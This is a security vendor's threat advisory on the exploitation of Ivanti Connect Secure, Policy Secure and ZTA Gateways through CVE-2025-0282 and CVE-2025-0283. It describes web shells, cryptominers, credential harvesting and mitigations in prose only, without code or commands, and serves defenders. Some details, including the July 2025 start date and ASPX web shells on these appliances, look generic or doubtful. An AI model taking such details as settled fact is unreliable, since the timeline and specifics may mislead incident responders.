Executive Summary

Since July 2025, exploitation of zero-day vulnerabilities in Ivanti products has surged, with sophisticated threat actors targeting Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA Gateways. These attacks leverage previously unknown flaws to achieve remote code execution, persistent access, and lateral movement within enterprise environments. The campaign has been traced to multiple high-profile incidents across Europe, affecting critical sectors such as finance, telecommunications, healthcare, and government. Attackers have deployed web shells, cryptocurrency miners, and advanced malware, resulting in data exfiltration, operational disruption, and significant risk to organizational integrity. This advisory provides a comprehensive technical analysis, threat actor profiling, exploitation details, victimology, and actionable mitigation strategies to help organizations defend against these ongoing threats.

Threat Actor Profile

The exploitation wave against Ivanti products exhibits hallmarks of advanced persistent threat (APT) operations, though no single group has been definitively attributed. The attackers demonstrate a high degree of technical sophistication, leveraging custom exploit chains, obfuscated payloads, and multi-stage intrusion tactics. Their operational tempo and targeting patterns suggest either state-sponsored actors or highly organized cybercriminal syndicates. The campaign’s focus on critical infrastructure and regulated industries, combined with the use of advanced evasion techniques, aligns with the TTPs (Tactics, Techniques, and Procedures) cataloged in the MITRE ATT&CK framework, specifically techniques such as Exploit Public-Facing Application (T1190), Command and Scripting Interpreter (T1059), and Ingress Tool Transfer (T1105). The attackers have demonstrated adaptability, rapidly shifting payloads and infrastructure in response to public disclosures and vendor mitigations.

Technical Analysis of Malware/TTPs

The primary vulnerabilities exploited are CVE-2025-0282 and CVE-2025-0283. CVE-2025-0282 is a stack-based buffer overflow present in Ivanti Connect Secure versions prior to 22.7R2.5, Ivanti Policy Secure before 22.7R1.2, and Ivanti Neurons for ZTA Gateways before 22.7R2.3. Successful exploitation allows remote, unauthenticated attackers to execute arbitrary code with system-level privileges. Attackers initiate exploitation by sending specially crafted HTTP requests to exposed management interfaces, triggering the overflow and gaining shell access.

Post-exploitation, adversaries deploy web shells (such as cmd.jsp and shell.aspx) into web-accessible directories, enabling persistent remote command execution. In several observed cases, attackers have installed cryptocurrency mining software, leveraging compromised infrastructure for illicit financial gain. Lateral movement is facilitated through credential harvesting and the use of valid accounts (T1078), often by extracting cached credentials or leveraging session tokens from memory.

Network traffic analysis reveals outbound connections to known command-and-control (C2) servers and cryptocurrency mining pools. Attackers employ encrypted channels and domain fronting to evade detection. Internal reconnaissance is conducted using built-in system utilities and custom scripts, mapping network shares, enumerating user accounts, and probing for additional vulnerable assets. Persistence mechanisms include scheduled tasks, service modifications, and the deployment of rootkits or kernel-level drivers in advanced cases.

The malware ecosystem observed in these campaigns is modular, with initial access payloads downloading secondary stages from attacker-controlled infrastructure. These stages include credential dumpers, privilege escalation tools, and data exfiltration utilities. The attackers demonstrate a preference for "living off the land" techniques, minimizing the use of custom binaries to reduce their forensic footprint.

Exploitation in the Wild

The first confirmed exploitation of these Ivanti zero-days occurred in July 2025, with a marked increase in activity through late 2025 and into 2026. Public and private sector organizations across Germany, France, the United Kingdom, Netherlands, Italy, and Spain have reported incidents. Attackers have demonstrated a high degree of automation, scanning for vulnerable instances and deploying exploits at scale. In several cases, exploitation was detected only after significant dwell time, with attackers maintaining access for weeks before discovery.

Incident response investigations have uncovered forensic artifacts such as unauthorized web shell files, anomalous process trees originating from Ivanti services, and evidence of internal network scanning. Outbound traffic to cryptocurrency mining pools and C2 infrastructure has been a consistent indicator of compromise. The exploitation campaigns have been opportunistic, with attackers targeting any exposed and unpatched Ivanti instance, regardless of organizational size or sector.

Victimology and Targeting

The victim profile is broad, encompassing enterprises in finance, telecommunications, healthcare, and government. The common denominator among victims is the deployment of vulnerable Ivanti products with internet-exposed management interfaces. Attackers have shown a preference for organizations with large user populations and critical business functions, maximizing the potential impact of compromise.

Geographically, the campaign has concentrated on Western and Central Europe, though isolated incidents have been reported in North America and Asia. The targeting does not appear to be ideologically motivated; rather, it is driven by the opportunity for financial gain, data theft, and potential access to sensitive infrastructure. In several high-profile cases, attackers have exfiltrated sensitive data, including authentication credentials, configuration files, and internal documentation, which may be leveraged for future attacks or sold on underground forums.

Mitigation and Countermeasures

Immediate mitigation requires patching all affected Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA Gateways to the latest available versions (22.7R2.5, 22.7R1.2, and 22.7R2.3 or later, respectively). Organizations must audit their perimeter for exposed management interfaces and restrict access to trusted administrative networks using network segmentation and firewall rules. Enforcing multi-factor authentication (MFA) for all administrative access to Ivanti products is critical to reducing the risk of credential-based attacks.

Continuous monitoring for indicators of compromise is essential. Security teams should review web server directories for unauthorized files, analyze process trees for anomalous activity originating from Ivanti services, and inspect outbound network traffic for connections to known C2 domains and cryptocurrency mining pools. Implementing endpoint detection and response (EDR) solutions with behavioral analytics can aid in the early detection of post-exploitation activity.

Incident response plans should be updated to include specific playbooks for Ivanti exploitation scenarios. Regular backups of configuration data and critical assets must be maintained and tested for integrity. Organizations are encouraged to conduct proactive threat hunting, focusing on the TTPs outlined in this advisory, and to engage with trusted threat intelligence providers for timely updates on evolving attacker methodologies.

References

SecurityWeek: Ivanti Exploitation Surges as Zero-Day Attacks Traced Back to July 2025

Cyber News Live LinkedIn Post: Ivanti Exploitation Surges

OffSeq Threat Radar: Ivanti Exploitation Surges

NVD: CVE-2025-0282

NVD: CVE-2025-0283

Ivanti Security Advisory: Security Advisory for Ivanti Connect Secure, Policy Secure, ZTA Gateways

CISA Mitigation Instructions: CISA Mitigation for CVE-2025-0282

WatchTowr Labs: Exploitation Walkthrough and Techniques

PoC Exploit (GitHub): CVE-2025-0282

Cloud Google Threat Intelligence: Ivanti Connect Secure VPN Zero-Day

CISA KEV Catalog: Known Exploited Vulnerabilities Catalog

About Rescana

Rescana empowers organizations to proactively manage third-party risk and strengthen their cybersecurity posture through our advanced TPRM platform. Our solution delivers continuous monitoring, automated risk assessments, and actionable intelligence, enabling security teams to identify, prioritize, and mitigate threats across their digital supply chain. By leveraging cutting-edge analytics and real-time threat intelligence, Rescana helps organizations stay ahead of emerging risks and regulatory requirements. For more information or to discuss how we can support your security objectives, we are happy to answer questions at ops@rescana.com.